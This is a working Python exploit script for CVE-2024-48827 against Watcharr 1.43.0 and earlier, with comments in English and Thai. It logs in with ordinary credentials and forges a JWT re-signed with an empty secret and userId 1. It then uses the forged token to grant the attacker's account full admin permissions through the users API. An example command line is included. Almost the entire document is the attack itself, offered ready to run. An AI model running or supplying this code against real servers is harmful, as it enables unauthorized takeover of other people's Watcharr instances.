<\/p>\n
# CVE-2024-48827 exploit by Suphawith Phusanbai
\n# Affected Watcharr version 1.43.0 and below.
\nimport argparse
\nimport requests
\nimport json
\nimport jwt
\nfrom pyfiglet import Figlet
\n
\nf = Figlet(font='slant',width=100)
\nprint(f.renderText('CVE-2024-48827'))
\n
\n#store JWT token and UserID \\ \u0e40\u0e01\u0e47\u0e1a token \u0e01\u0e31\u0e1a UserID
\njwt_token = None
\nuser_id = None
\n
\n#login to obtain JWT token \/ \u0e25\u0e47\u0e2d\u0e04\u0e2d\u0e34\u0e19\u0e40\u0e1e\u0e37\u0e48\u0e2d\u0e23\u0e31\u0e1a JWT Token
\ndef login(host, port, username, password):
\n url = f'http:\/\/{host}:{port}\/api\/auth\/'
\n #payload in login API request \\ payload \u0e43\u0e19 json
\n payload = {
\n 'username': username,
\n 'password': password
\n }
\n
\n headers = {
\n 'Content-Type': 'application\/json'
\n }
\n #login to obtain JWT token \\ \u0e25\u0e47\u0e2d\u0e04\u0e2d\u0e34\u0e19\u0e40\u0e1e\u0e34\u0e48\u0e2d\u0e40\u0e01\u0e47\u0e1a JWT token \u0e41\u0e25\u0e49\u0e27\u0e43\u0e2a\u0e48\u0e43\u0e19 jwt_token object
\n try:
\n response = requests.post(url, data=json.dumps(payload), headers=headers)
\n if response.status_code == 200:
\n token = response.json().get('token')
\n if token:
\n print(f\"[+] SUCCESS! JWT Token: {token}\")
\n global jwt_token
\n jwt_token = token
\n
\n #decode JWT token and store UserID in UserID object \\ \u0e14\u0e35\u0e42\u0e04\u0e49\u0e14 JWT token \u0e41\u0e25\u0e49\u0e27\u0e40\u0e01\u0e47\u0e1a\u0e04\u0e48\u0e32 UserID \u0e43\u0e2a\u0e48\u0e43\u0e19 UserID object
\n decoded_payload = jwt.decode(token, options={\"verify_signature\": False})
\n global user_id
\n user_id = decoded_payload.get('userId')
\n
\n return token
\n else:
\n print(\"[-] Check your password again!\")
\n else:
\n print(f\"[-] Failed :(\")
\n print(f\"Response: {response.text}\")
\n except Exception as e:
\n print(f\"Error! HTTP response code: {e}\")
\n
\n#craft the admin token(to make this work you need to know admin username) \\ \u0e2a\u0e23\u0e49\u0e32\u0e07 admin JWT token \u0e02\u0e36\u0e49\u0e19\u0e21\u0e32\u0e43\u0e2b\u0e21\u0e48\u0e42\u0e14\u0e22\u0e43\u0e0a\u0e49 token \u0e17\u0e35\u0e48\u0e25\u0e47\u0e2d\u0e04\u0e2d\u0e34\u0e19
\ndef create_new_jwt(original_token):
\n try:
\n decoded_payload = jwt.decode(original_token, options={\"verify_signature\": False})
\n #userID = 1 is always the admin \\ userID \u0e25\u0e33\u0e14\u0e31\u0e1a\u0e17\u0e35\u0e48 1 \u0e04\u0e37\u0e2d admin \u0e40\u0e2a\u0e21\u0e2d
\n decoded_payload['userId'] = 1
\n new_token = jwt.encode(decoded_payload, '', algorithm='HS256')
\n print(f\"[+] New JWT Token: {new_token}\")
\n return new_token
\n except Exception as e:
\n print(f\"[-] Failed to create new JWT: {e}\")
\n
\n#privilege escalation with the crafted JWT token \\ PE \u0e42\u0e14\u0e22\u0e01\u0e32\u0e23\u0e43\u0e0a\u0e49 crafted admin token
\ndef privilege_escalation(host, port, adminuser, token):
\n #specify API endpoint for giving users admin role \\ \u0e40\u0e23\u0e35\u0e22\u0e01\u0e43\u0e0a\u0e49\u0e07\u0e32\u0e19 API \u0e2a\u0e33\u0e2b\u0e23\u0e31\u0e1a\u0e43\u0e2b\u0e49\u0e2a\u0e34\u0e17\u0e18\u0e34\u0e4c user admin
\n url = f'http:\/\/{host}:{port}\/api\/server\/users\/{user_id}'
\n
\n # permission 3 givefull access privs you can also use 6 and 9 to gain partial admin privileges. \\ \u0e43\u0e2b\u0e49\u0e2a\u0e34\u0e17\u0e18\u0e34\u0e4c admin \u0e17\u0e31\u0e49\u0e07\u0e2b\u0e21\u0e14\u0e14\u0e49\u0e27\u0e22 permission = 3
\n payload = {
\n \"permissions\": 3
\n }
\n
\n headers = {
\n 'Authorization': f'{token}',
\n 'Content-Type': 'application\/json'
\n }
\n
\n try:
\n response = requests.post(url, data=json.dumps(payload), headers=headers)
\n if response.status_code == 200:
\n print(f\"[+] Privilege Escalation Successful! The current user is now an admin!\")
\n else:
\n print(f\"[-] Failed to escalate privileges. Response: {response.text}\")
\n except Exception as e:
\n print(f\"Error during privilege escalation: {e}\")
\n
\n
\n#exampl usage: python3 CVE-2024-48827.py -u dummy -p dummy -host 172.22.123.13 -port 3080 -adminuser admin
\n#usage
\nif __name__ == \"__main__\":
\n parser = argparse.ArgumentParser(description='Exploit CVE-2024-48827 to obtain JWT token and escalate privileges.')
\n parser.add_argument('-host', '--host', type=str, help='Host or IP address', required=True)
\n parser.add_argument('-port', '--port', type=int, help='Port', required=True, default=3080)
\n parser.add_argument('-u', '--username', type=str, help='Username for login', required=True)
\n parser.add_argument('-p', '--password', type=str, help='Password for login', required=True)
\n parser.add_argument('-adminuser', '--adminuser', type=str, help='Admin username to escalate privileges', required=True)
\n args = parser.parse_args()
\n
\n #step 1: login
\n token = login(args.host, args.port, args.username, args.password)
\n
\n #step 2: craft the admin token
\n if token:
\n new_token = create_new_jwt(token)
\n #step 3: Escalate privileges with crafted token. Enjoy!
\n if new_token:
\n privilege_escalation(args.host, args.port, args.adminuser, new_token)\n <\/code><\/pre>\n<\/p><\/div>\n